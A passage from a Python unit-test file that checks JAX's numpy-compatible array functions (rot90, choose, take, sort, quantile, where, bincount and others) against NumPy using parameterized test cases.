"shape": shape, "dtype": dtype, "k": k, "axes": axes}
for shape, axes in [
[(2, 3), (0, 1)],
[(2, 3), (1, 0)],
[(4, 3, 2), (0, 2)],
[(4, 3, 2), (2, 1)],
]
for k in range(-3, 4)
for dtype in default_dtypes))
def testRot90(self, shape, dtype, k, axes):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.rot90(x, k, axes)
np_op = lambda x: np.rot90(x, k, axes)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test infix operator overrides
def testRavel(self):
rng = np.random.RandomState(0)
args_maker = lambda: [rng.randn(3, 4).astype("float32")]
self._CompileAndCheck(lambda x: x.ravel(), args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_order={}_mode={}".format(
shape, order, mode),
"shape": shape, "order": order, "mode": mode}
for shape in nonempty_nonscalar_array_shapes
for order in ['C', 'F']
for mode in ['wrap', 'clip', 'raise']))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testRavelMultiIndex(self, shape, order, mode):
# generate indices in each dimension with a few out of bounds.
rngs = [jtu.rand_int(self.rng(), low=-1, high=dim + 1)
for dim in shape]
# generate multi_indices of different dimensions that broadcast.
args_maker = lambda: [tuple(rng(ndim * (3,), jnp.int_)
for ndim, rng in enumerate(rngs))]
def np_fun(x):
try:
return np.ravel_multi_index(x, shape, order=order, mode=mode)
except ValueError as err:
if str(err).startswith('invalid entry'):
# sentinel indicating expected error.
return -999
else:
raise
def jnp_fun(x):
try:
return jnp.ravel_multi_index(x, shape, order=order, mode=mode)
except ValueError as err:
if str(err).startswith('invalid entry'):
# sentinel indicating expected error.
return -999
else:
raise
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
if mode == 'raise':
msg = ("The error occurred because ravel_multi_index was jit-compiled "
"with mode='raise'. Use mode='wrap' or mode='clip' instead.")
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
jax.jit(jnp_fun)(*args_maker())
else:
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ashape={}{}_cshapes={}{}_mode={}".format(
adtype.__name__, ashape, cdtype.__name__, cshapes, mode),
"ashape": ashape, "adtype": adtype, "cshapes": cshapes, "cdtype": cdtype, "mode": mode}
for ashape in ((), (4,), (3, 4))
for cshapes in [
[(), (4,)],
[(3, 4), (4,), (3, 1)]
]
for adtype in int_dtypes
for cdtype in default_dtypes
for mode in ['wrap', 'clip', 'raise']))
def testChoose(self, ashape, adtype, cshapes, cdtype, mode):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(ashape, adtype), [rng(s, cdtype) for s in cshapes]]
def np_fun(a, c):
try:
return np.choose(a, c, mode=mode)
except ValueError as err:
if mode == 'raise' and str(err).startswith('invalid entry'):
return -999 # sentinel indicating expected error.
else:
raise
def jnp_fun(a, c):
try:
return jnp.choose(a, c, mode=mode)
except ValueError as err:
if mode == 'raise' and str(err).startswith('invalid entry'):
return -999 # sentinel indicating expected error.
else:
raise
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
if mode == 'raise':
msg = ("The error occurred because jnp.choose was jit-compiled"
" with mode='raise'. Use mode='wrap' or mode='clip' instead.")
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
jax.jit(jnp_fun)(*args_maker())
else:
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.parameters(
(0, (2, 1, 3)),
(5, (2, 1, 3)),
(0, ()),
([0, 1, 2], (2, 2)),
([[[0, 1], [2, 3]]], (2, 2)))
def testUnravelIndex(self, flat_index, shape):
args_maker = lambda: (flat_index, shape)
self._CheckAgainstNumpy(np.unravel_index, jnp.unravel_index,
args_maker)
self._CompileAndCheck(jnp.unravel_index, args_maker)
def testUnravelIndexOOB(self):
self.assertEqual(jnp.unravel_index(2, (2,)), (1,))
self.assertEqual(jnp.unravel_index(-2, (2, 1, 3,)), (1, 0, 1))
self.assertEqual(jnp.unravel_index(-3, (2,)), (0,))
def testAstype(self):
rng = np.random.RandomState(0)
args_maker = lambda: [rng.randn(3, 4).astype("float32")]
np_op = lambda x: np.asarray(x).astype(jnp.int32)
jnp_op = lambda x: jnp.asarray(x).astype(jnp.int32)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in array_shapes
for dtype in all_dtypes))
def testNbytes(self, shape, dtype):
rng = jtu.rand_default(self.rng())
np_op = lambda x: np.asarray(x).nbytes
jnp_op = lambda x: jnp.asarray(x).nbytes
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_dtype={}".format(
jtu.format_shape_dtype_string(shape, a_dtype), dtype),
"shape": shape, "a_dtype": a_dtype, "dtype": dtype}
for shape in [(8,), (3, 8)] # last dim = 8 to ensure shape compatibility
for a_dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)
for dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)))
def testView(self, shape, a_dtype, dtype):
if jtu.device_under_test() == 'tpu':
if jnp.dtype(a_dtype).itemsize in [1, 2] or jnp.dtype(dtype).itemsize in [1, 2]:
self.skipTest("arr.view() not supported on TPU for 8- or 16-bit types.")
if not config.x64_enabled:
if jnp.dtype(a_dtype).itemsize == 8 or jnp.dtype(dtype).itemsize == 8:
self.skipTest("x64 types are disabled by jax_enable_x64")
rng = jtu.rand_fullrange(self.rng())
args_maker = lambda: [rng(shape, a_dtype)]
np_op = lambda x: np.asarray(x).view(dtype)
jnp_op = lambda x: jnp.asarray(x).view(dtype)
# Above may produce signaling nans; ignore warnings from invalid values.
with np.errstate(invalid='ignore'):
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testPathologicalFloats(self):
args_maker = lambda: [np.array([
0b_0111_1111_1000_0000_0000_0000_0000_0000, # inf
0b_1111_1111_1000_0000_0000_0000_0000_0000, # -inf
0b_0111_1111_1100_0000_0000_0000_0000_0000, # qnan
0b_1111_1111_1100_0000_0000_0000_0000_0000, # -qnan
0b_0111_1111_1000_0000_0000_0000_0000_0001, # snan
0b_1111_1111_1000_0000_0000_0000_0000_0001, # -snan
0b_0111_1111_1000_0000_0000_1100_0000_0000, # nonstandard nan
0b_1111_1111_1000_0000_0000_1100_0000_0000, # -nonstandard nan
0b_0000_0000_0000_0000_0000_0000_0000_0000, # zero
0b_1000_0000_0000_0000_0000_0000_0000_0000, # -zero
], dtype='uint32')]
np_op = lambda x: np.asarray(x).view('float32').view('uint32')
jnp_op = lambda x: jnp.asarray(x).view('float32').view('uint32')
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test other ndarray-like method overrides
def testNpMean(self):
# from https://github.com/google/jax/issues/125
x = lax.add(jnp.eye(3, dtype=float), 0.)
ans = np.mean(x)
self.assertAllClose(ans, np.array(1./3), check_dtypes=False)
def testArangeOnFloats(self):
# from https://github.com/google/jax/issues/145
self.assertAllClose(np.arange(0.0, 1.0, 0.1, dtype=jnp.float_),
jnp.arange(0.0, 1.0, 0.1))
# from https://github.com/google/jax/issues/3450
self.assertAllClose(np.arange(2.5, dtype=jnp.float_),
jnp.arange(2.5))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for dtype in all_dtypes
for shape in nonzerodim_shapes
for axis in (None, *range(len(shape)))))
def testSort(self, dtype, shape, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_fun = jnp.sort
np_fun = np.sort
if axis is not None:
jnp_fun = partial(jnp_fun, axis=axis)
np_fun = partial(np_fun, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for dtype in all_dtypes
for shape in one_dim_array_shapes
for axis in [None]))
def testSortComplex(self, dtype, shape, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np.sort_complex, jnp.sort_complex, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp.sort_complex, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_input_type={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype),
input_type.__name__, axis),
"shape": shape, "dtype": dtype, "input_type": input_type, "axis": axis}
for dtype in all_dtypes
for shape in nonempty_nonscalar_array_shapes
for input_type in [np.array, tuple]
for axis in (-1, *range(len(shape) - 1))))
def testLexsort(self, dtype, shape, input_type, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [input_type(rng(shape, dtype))]
jnp_op = lambda x: jnp.lexsort(x, axis=axis)
np_op = lambda x: np.lexsort(x, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for dtype in all_dtypes
for shape in nonzerodim_shapes
for axis in (None, *range(len(shape)))))
def testArgsort(self, dtype, shape, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_fun = jnp.argsort
np_fun = np.argsort
if axis is not None:
jnp_fun = partial(jnp_fun, axis=axis)
np_fun = partial(np_fun, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for dtype in all_dtypes
for shape in nonzerodim_shapes))
def testMsort(self, dtype, shape):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np.msort, jnp.msort, args_maker)
self._CompileAndCheck(jnp.msort, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_shifts={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype),
shifts, axis),
"shape": shape, "dtype": dtype, "shifts": shifts, "axis": axis}
for dtype in all_dtypes
for shape in [(3, 4), (3, 4, 5), (7, 4, 0)]
for shifts, axis in [
(3, None),
(1, 1),
((3,), (0,)),
((-2,), (-2,)),
((1, 2), (0, -1)),
((4, 2, 5, 5, 2, 4), None),
(100, None),
]))
def testRoll(self, shape, dtype, shifts, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype), np.array(shifts)]
jnp_op = partial(jnp.roll, axis=axis)
np_op = partial(np.roll, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_start={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis, start),
"shape": shape, "dtype": dtype, "axis": axis,
"start": start}
for dtype in all_dtypes
for shape in [(1, 2, 3, 4)]
for axis in [-3, 0, 2, 3]
for start in [-4, -1, 2, 4]))
def testRollaxis(self, shape, dtype, start, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_op = partial(jnp.rollaxis, axis=axis, start=start)
np_op = partial(np.rollaxis, axis=axis, start=start)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_bitorder={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, bitorder),
"shape": shape, "dtype": dtype, "axis": axis,
"bitorder": bitorder}
for dtype in [np.uint8, np.bool_]
for bitorder in ['big', 'little']
for shape in [(1, 2, 3, 4)]
for axis in [None, 0, 1, -2, -1]))
def testPackbits(self, shape, dtype, axis, bitorder):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_op = partial(jnp.packbits, axis=axis, bitorder=bitorder)
np_op = partial(np.packbits, axis=axis, bitorder=bitorder)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_bitorder={}_count={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, bitorder, count),
"shape": shape, "dtype": dtype, "axis": axis, "bitorder": bitorder,
"count": count}
for dtype in [np.uint8]
for bitorder in ['big', 'little']
for shape in [(1, 2, 3, 4)]
for axis in [None, 0, 1, -2, -1]
for count in [None, 20]))
def testUnpackbits(self, shape, dtype, axis, bitorder, count):
rng = jtu.rand_int(self.rng(), 0, 256)
args_maker = lambda: [rng(shape, dtype)]
jnp_op = partial(jnp.unpackbits, axis=axis, bitorder=bitorder)
np_op = partial(np.unpackbits, axis=axis, bitorder=bitorder)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_index={}_axis={}_mode={}".format(
jtu.format_shape_dtype_string(shape, dtype),
jtu.format_shape_dtype_string(index_shape, index_dtype),
axis, mode),
"shape": shape, "index_shape": index_shape, "dtype": dtype,
"index_dtype": index_dtype, "axis": axis, "mode": mode}
for shape in [(3,), (3, 4), (3, 4, 5)]
for index_shape in scalar_shapes + [(3,), (2, 1, 3)]
for axis in itertools.chain(range(-len(shape), len(shape)),
[cast(Optional[int], None)])
for dtype in all_dtypes
for index_dtype in int_dtypes
for mode in [None, 'wrap', 'clip']))
def testTake(self, shape, dtype, index_shape, index_dtype, axis, mode):
def args_maker():
x = rng(shape, dtype)
i = rng_indices(index_shape, index_dtype)
return x, i
rng = jtu.rand_default(self.rng())
if mode is None:
rng_indices = jtu.rand_int(self.rng(), -shape[axis or 0], shape[axis or 0])
else:
rng_indices = jtu.rand_int(self.rng(), -5, 5)
jnp_op = lambda x, i: jnp.take(x, i, axis=axis, mode=mode)
np_op = lambda x, i: np.take(x, i, axis=axis, mode=mode)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testTakeEmpty(self):
np.testing.assert_array_equal(
jnp.array([], dtype=jnp.float32),
jnp.take(jnp.array([], jnp.float32), jnp.array([], jnp.int32)))
np.testing.assert_array_equal(
jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32), jnp.array([], jnp.int32),
axis=1))
with self.assertRaisesRegex(IndexError, "non-empty jnp.take"):
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.array([0], jnp.int32), axis=1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_index={}_axis={}".format(
jtu.format_shape_dtype_string(x_shape, dtype),
jtu.format_shape_dtype_string(i_shape, index_dtype), axis),
"x_shape": x_shape, "i_shape": i_shape, "dtype": dtype,
"index_dtype": index_dtype, "axis": axis}
for x_shape, i_shape in filter(
_shapes_are_equal_length,
filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_nonscalar_array_shapes, 2)))
for axis in itertools.chain(range(len(x_shape)), [-1],
[cast(Optional[int], None)])
for dtype in default_dtypes
for index_dtype in int_dtypes))
def testTakeAlongAxis(self, x_shape, i_shape, dtype, index_dtype, axis):
rng = jtu.rand_default(self.rng())
i_shape = np.array(i_shape)
if axis is None:
i_shape = [np.prod(i_shape, dtype=np.int64)]
else:
# Test the case where the size of the axis doesn't necessarily broadcast.
i_shape[axis] *= 3
i_shape = list(i_shape)
def args_maker():
x = rng(x_shape, dtype)
n = np.prod(x_shape, dtype=np.int32) if axis is None else x_shape[axis]
if np.issubdtype(index_dtype, np.unsignedinteger):
index_rng = jtu.rand_int(self.rng(), 0, n)
else:
index_rng = jtu.rand_int(self.rng(), -n, n)
i = index_rng(i_shape, index_dtype)
return x, i
jnp_op = lambda x, i: jnp.take_along_axis(x, i, axis=axis)
if hasattr(np, "take_along_axis"):
np_op = lambda x, i: np.take_along_axis(x, i, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testTakeAlongAxisWithUint8IndicesDoesNotOverflow(self):
# https://github.com/google/jax/issues/5088
h = jtu.rand_default(self.rng())((256, 256, 100), np.float32)
g = jtu.rand_int(self.rng(), 0, 100)((256, 256, 1), np.uint8)
q0 = jnp.take_along_axis(h, g, axis=-1)
q1 = np.take_along_axis( h, g, axis=-1)
np.testing.assert_equal(q0, q1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_n={}_increasing={}".format(
jtu.format_shape_dtype_string([shape], dtype),
n, increasing),
"dtype": dtype, "shape": shape, "n": n, "increasing": increasing}
for dtype in inexact_dtypes
for shape in [0, 5]
for n in [2, 4]
for increasing in [False, True]))
def testVander(self, shape, dtype, n, increasing):
rng = jtu.rand_default(self.rng())
def np_fun(arg):
arg = arg.astype(np.float32) if dtype == jnp.bfloat16 else arg
return np.vander(arg, N=n, increasing=increasing)
jnp_fun = lambda arg: jnp.vander(arg, N=n, increasing=increasing)
args_maker = lambda: [rng([shape], dtype)]
# np.vander seems to return float64 for all floating types. We could obey
# those semantics, but they seem like a bug.
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol={np.float32: 1e-3})
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(
"nan_to_num", [shape], [dtype]),
"shape": shape, "dtype": dtype}
for shape in array_shapes
for dtype in inexact_dtypes))
def testNanToNum(self, shape, dtype):
rng = jtu.rand_some_inf_and_nan(self.rng())
dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
def np_fun(x):
if dtype == jnp.bfloat16:
x = np.where(np.isnan(x), dtype(0), x)
x = np.where(np.isposinf(x), jnp.finfo(dtype).max, x)
x = np.where(np.isneginf(x), jnp.finfo(dtype).min, x)
return x
else:
return np.nan_to_num(x).astype(dtype)
args_maker = lambda: [rng(shape, dtype)]
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
self._CheckAgainstNumpy(np_fun, jnp.nan_to_num, args_maker,
check_dtypes=check_dtypes)
self._CompileAndCheck(jnp.nan_to_num, args_maker,
check_dtypes=check_dtypes)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("ix_", shapes, dtypes),
"shapes": shapes, "dtypes": dtypes}
for shapes, dtypes in (
((), ()),
(((7,),), (np.int32,)),
(((3,), (4,)), (np.int32, np.int32)),
(((3,), (1,), (4,)), (np.int32, np.int32, np.int32)),
)))
def testIx_(self, shapes, dtypes):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)
for shape, dtype in zip(shapes, dtypes)]
self._CheckAgainstNumpy(np.ix_, jnp.ix_, args_maker)
self._CompileAndCheck(jnp.ix_, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_dimensions={}_dtype={}_sparse={}".format(
dimensions, dtype, sparse),
"dimensions": dimensions, "dtype": dtype, "sparse": sparse}
for dimensions in [(), (2,), (3, 0), (4, 5, 6)]
for dtype in number_dtypes
for sparse in [True, False]))
def testIndices(self, dimensions, dtype, sparse):
def args_maker(): return []
np_fun = partial(np.indices, dimensions=dimensions,
dtype=dtype, sparse=sparse)
jnp_fun = partial(jnp.indices, dimensions=dimensions,
dtype=dtype, sparse=sparse)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
"_op={}_a_shape={}_q_shape={}_axis={}_keepdims={}_interpolation={}".format(
op,
jtu.format_shape_dtype_string(a_shape, a_dtype),
jtu.format_shape_dtype_string(q_shape, q_dtype),
axis, keepdims, interpolation),
"a_rng": jtu.rand_some_nan,
"q_rng": q_rng, "op": op,
"a_shape": a_shape, "a_dtype": a_dtype,
"q_shape": q_shape, "q_dtype": q_dtype, "axis": axis,
"keepdims": keepdims,
"interpolation": interpolation}
for (op, q_rng) in (
("percentile", partial(jtu.rand_uniform, low=0., high=100.)),
("quantile", partial(jtu.rand_uniform, low=0., high=1.)),
("nanpercentile", partial(jtu.rand_uniform, low=0., high=100.)),
("nanquantile", partial(jtu.rand_uniform, low=0., high=1.)),
)
for a_dtype in default_dtypes
for a_shape, axis in (
((7,), None),
((47, 7), 0),
((4, 101), 1),
)
for q_dtype in [np.float32]
for q_shape in scalar_shapes + [(4,)]
for keepdims in [False, True]
for interpolation in ['linear', 'lower', 'higher', 'nearest',
'midpoint']))
def testQuantile(self, op, a_rng, q_rng, a_shape, a_dtype, q_shape, q_dtype,
axis, keepdims, interpolation):
a_rng = a_rng(self.rng())
q_rng = q_rng(self.rng())
if "median" in op:
args_maker = lambda: [a_rng(a_shape, a_dtype)]
else:
args_maker = lambda: [a_rng(a_shape, a_dtype), q_rng(q_shape, q_dtype)]
def np_fun(*args):
args = [x if jnp.result_type(x) != jnp.bfloat16 else
np.asarray(x, np.float32) for x in args]
return getattr(np, op)(*args, axis=axis, keepdims=keepdims,
interpolation=interpolation)
jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims,
interpolation=interpolation)
# TODO(phawkins): we currently set dtype=False because we aren't as
# aggressive about promoting to float64. It's not clear we want to mimic
# Numpy here.
tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
tol = max(jtu.tolerance(a_dtype, tol_spec),
jtu.tolerance(q_dtype, tol_spec))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
"_{}_a_shape={}_axis={}_keepdims={}".format(
op, jtu.format_shape_dtype_string(a_shape, a_dtype),
axis, keepdims),
"op": op, "a_shape": a_shape, "a_dtype": a_dtype,
"axis": axis,
"keepdims": keepdims}
for a_dtype in default_dtypes
for a_shape, axis in (
((7,), None),
((47, 7), 0),
((4, 101), 1),
)
for keepdims in [False, True]
for op in ["median", "nanmedian"]))
def testMedian(self, op, a_shape, a_dtype, axis, keepdims):
if op == "median":
a_rng = jtu.rand_default(self.rng())
else:
a_rng = jtu.rand_some_nan(self.rng())
args_maker = lambda: [a_rng(a_shape, a_dtype)]
def np_fun(*args):
args = [x if jnp.result_type(x) != jnp.bfloat16 else
np.asarray(x, np.float32) for x in args]
return getattr(np, op)(*args, axis=axis, keepdims=keepdims)
jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims)
# TODO(phawkins): we currently set dtype=False because we aren't as
# aggressive about promoting to float64. It's not clear we want to mimic
# Numpy here.
tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
tol = jtu.tolerance(a_dtype, tol_spec)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testWhereOneArgument(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.where(x)
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np_fun)
jnp_fun = lambda x: jnp.where(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying a size statically. Full test of
# this behavior is in testNonzeroSize().
jnp_fun = lambda x: jnp.where(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_{}".format("_".join(
jtu.format_shape_dtype_string(shape, dtype)
for shape, dtype in zip(shapes, dtypes))),
"shapes": shapes, "dtypes": dtypes
} for shapes in s(filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 3)))
for dtypes in s(itertools.combinations_with_replacement(all_dtypes, 3)))))
def testWhereThreeArgument(self, shapes, dtypes):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, shapes, dtypes)
def np_fun(cond, x, y):
return _promote_like_jnp(partial(np.where, cond))(x, y)
self._CheckAgainstNumpy(np_fun, jnp.where, args_maker)
self._CompileAndCheck(jnp.where, args_maker)
def testWhereScalarPromotion(self):
x = jnp.where(jnp.array([True, False]), 3,
jnp.ones((2,), dtype=jnp.float32))
self.assertEqual(x.dtype, np.dtype(np.float32))
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": jtu.format_test_name_suffix("", shapes, (np.bool_,) * n + dtypes),
"shapes": shapes, "dtypes": dtypes
} for n in s(range(1, 3))
for shapes in s(filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 2 * n + 1)))
for dtypes in s(itertools.combinations_with_replacement(all_dtypes, n + 1)))))
def testSelect(self, shapes, dtypes):
rng = jtu.rand_default(self.rng())
n = len(dtypes) - 1
def args_maker():
condlist = [rng(shape, np.bool_) for shape in shapes[:n]]
choicelist = [rng(shape, dtype)
for shape, dtype in zip(shapes[n:-1], dtypes[:n])]
default = rng(shapes[-1], dtypes[-1])
return condlist, choicelist, default
# TODO(phawkins): float32/float64 type mismatches
def np_fun(condlist, choicelist, default):
choicelist = [x if jnp.result_type(x) != jnp.bfloat16
else x.astype(np.float32) for x in choicelist]
dtype = jnp.result_type(default, *choicelist)
return np.select(condlist,
[np.asarray(x, dtype=dtype) for x in choicelist],
np.asarray(default, dtype=dtype))
self._CheckAgainstNumpy(np_fun, jnp.select, args_maker,
check_dtypes=False)
self._CompileAndCheck(jnp.select, args_maker,
rtol={np.float64: 1e-7, np.complex128: 1e-7})
def testIssue330(self):
x = jnp.full((1, 1), jnp.array([1])[0]) # doesn't crash
self.assertEqual(x[0, 0], 1)
def testScalarDtypePromotion(self):
orig_numpy_result = (1 + np.eye(1, dtype=np.float32)).dtype
jax_numpy_result = (1 + jnp.eye(1, dtype=jnp.float32)).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
def testSymmetrizeDtypePromotion(self):
x = np.eye(3, dtype=np.float32)
orig_numpy_result = ((x + x.T) / 2).dtype
x = jnp.eye(3, dtype=jnp.float32)
jax_numpy_result = ((x + x.T) / 2).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because
# introducing the convention 0 * inf = 0 leads to silently wrong results in
# some cases. See this comment for details:
# https://github.com/google/jax/issues/1052#issuecomment-514083352
# def testIssue347(self):
# # https://github.com/google/jax/issues/347
# def test_fail(x):
# x = jnp.sqrt(jnp.sum(x ** 2, axis=1))
# ones = jnp.ones_like(x)
# x = jnp.where(x > 0.5, x, ones)
# return jnp.sum(x)
# x = jnp.array([[1, 2], [3, 4], [0, 0]], dtype=jnp.float64)
# result = api.grad(test_fail)(x)
# assert not np.any(np.isnan(result))
def testIssue453(self):
# https://github.com/google/jax/issues/453
a = np.arange(6) + 1
ans = jnp.reshape(a, (3, 2), order='F')
expected = np.reshape(a, (3, 2), order='F')
self.assertAllClose(ans, expected)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_op={}_dtype={}".format(op, pytype.__name__),
"pytype": pytype, "dtype": dtype, "op": op}
for pytype, dtype in [(int, jnp.int_), (float, jnp.float_),
(bool, jnp.bool_), (complex, jnp.complex_)]
for op in ["atleast_1d", "atleast_2d", "atleast_3d"]))
def testAtLeastNdLiterals(self, pytype, dtype, op):
# Fixes: https://github.com/google/jax/issues/634
np_fun = lambda arg: getattr(np, op)(arg).astype(dtype)
jnp_fun = lambda arg: getattr(jnp, op)(arg)
args_maker = lambda: [pytype(2)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{
"testcase_name": "_shape={}_dtype={}_weights={}_minlength={}_length={}".format(
shape, dtype, weights, minlength, length
),
"shape": shape,
"dtype": dtype,
"weights": weights,
"minlength": minlength,
"length": length}
for shape in [(0,), (5,), (10,)]
for dtype in int_dtypes
for weights in [True, False]
for minlength in [0, 20]
for length in [None, 10]
))
def testBincount(self, shape, dtype, weights, minlength, length):
rng = jtu.rand_positive(self.rng())
args_maker = lambda: (rng(shape, dtype), (rng(shape, 'float32') if weights else None))
np_fun = partial(np.bincount, minlength=minlength)
jnp_fun = partial(jnp.bincount, minlength=minlength, length=length)
if length is not None:
